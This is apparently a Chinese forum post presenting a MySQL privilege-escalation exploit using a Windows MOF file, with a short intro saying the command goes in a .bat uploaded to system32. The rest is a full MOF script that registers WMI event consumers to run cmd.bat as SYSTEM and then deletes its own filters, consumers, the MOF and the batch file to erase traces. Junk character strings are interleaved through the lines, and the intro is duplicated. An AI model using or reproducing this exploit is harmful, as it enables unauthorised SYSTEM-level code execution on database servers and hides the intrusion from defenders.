Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。

$ \$ ]- g3 T0 \; M3 o1 z9 ^, E$ a这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。

% k6 b  k3 b6 m( O& \9 _+ h#pragma
                        namespace("\\\\.\\root\\cimv2")
$ H" m6 {6 i; q% Z* v" `+ Z6 L                        class
- ?+ C- z& f! R                        MyClass547
: c4 D- D4 D3 M9 L: ?                        {           [key]
# f- {& K2 k* L& g+ ~/ c7 h                        string
                        Name;
. L6 y7 N. ?# n) R* v3 U                        };
                        class
                        ActiveScriptEventConsumer
: c2 `  V2 y5 w                        : __EventConsumer {          [key]
* t& _2 K* U" m4 C+ |* p) h& I6 s                        string
                        Name;           [not_null]
                        string
) ^7 g5 y  @! Q! h                        ScriptingEngine;           string
                        ScriptFileName;           [template]
                        string
                        ScriptText;         uint32 KillTimeout;
# p- w4 b4 m' f0 [                        }; instance of __Win32Provider as $P {
                        Name
                        =
                        "ActiveScriptEventConsumer";     CLSID =
                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
# q  e9 c; a/ m                        PerUserInitialization
                        = TRUE;
                        }; instance of __EventConsumerProviderRegistration {         Provider
$ A& [3 _% _) ^                        = $P;         ConsumerClassNames
                        =
                        {"ActiveScriptEventConsumer"};
3 r& I! P* T' `% c0 h0 n$ {0 _: I2 P                        };
7 X3 K8 ?% |  U" N4 d0 X                        Instance of ActiveScriptEventConsumer
/ x3 K4 r, S- a! N" o- v                        as $cons {         Name
                        =
2 {: m, z1 E; h3 ?% ~- N                        "ASEC";         ScriptingEngine
' ~" Q* N2 S; I2 @9 x                        =
                        "JScript";         ScriptText
# x+ H" S( d1 ], `                        =
                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
                        Instance of ActiveScriptEventConsumer
                        as $cons2 {         Name
                        =
# P( V0 ]* K, R3 L                        "qndASEC";         ScriptingEngine
8 g' l: e4 Y% [; O% O                        =
                        "JScript";         ScriptText
                        =
. N& N' g$ y5 a5 b: I/ x                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
9 `% W/ z' v) Y% n' U3 ?  P* S% N                        }; instance of __EventFilter as $Filt {         Name
                        =
                        "instfilt";         Query
                        =
                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
+ Z8 Y* B5 W8 E, }% k7 |$ {& v7 }$ Y5 B                        =
5 [) I9 {+ J4 v                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
                        =
                        "qndfilt";         Query
' X$ ^5 \" w1 y; F                        =
' o$ m# `* P( D9 ^3 M* A2 [                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
                        = $cons;         Filter
                        = $Filt;
3 a0 j9 b0 z  @" a9 h                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
: q' h7 a8 l  \9 T                        = $cons2;         Filter
8 c/ M; N" \; E" A; X& p                        = $Filt2;
- O& _1 R/ q. z* p                        }; instance of MyClass547
0 ~' g$ H' @8 T. k6 m3 [1 k% Y6 Z                        as $MyClass {         Name
  Q1 G7 L  i5 f) ~                        =
) U. @' ?  H% O: O                        "ClassConsumer";
7 A1 Z$ p2 m! }. u4 Q% w" D3 a                        };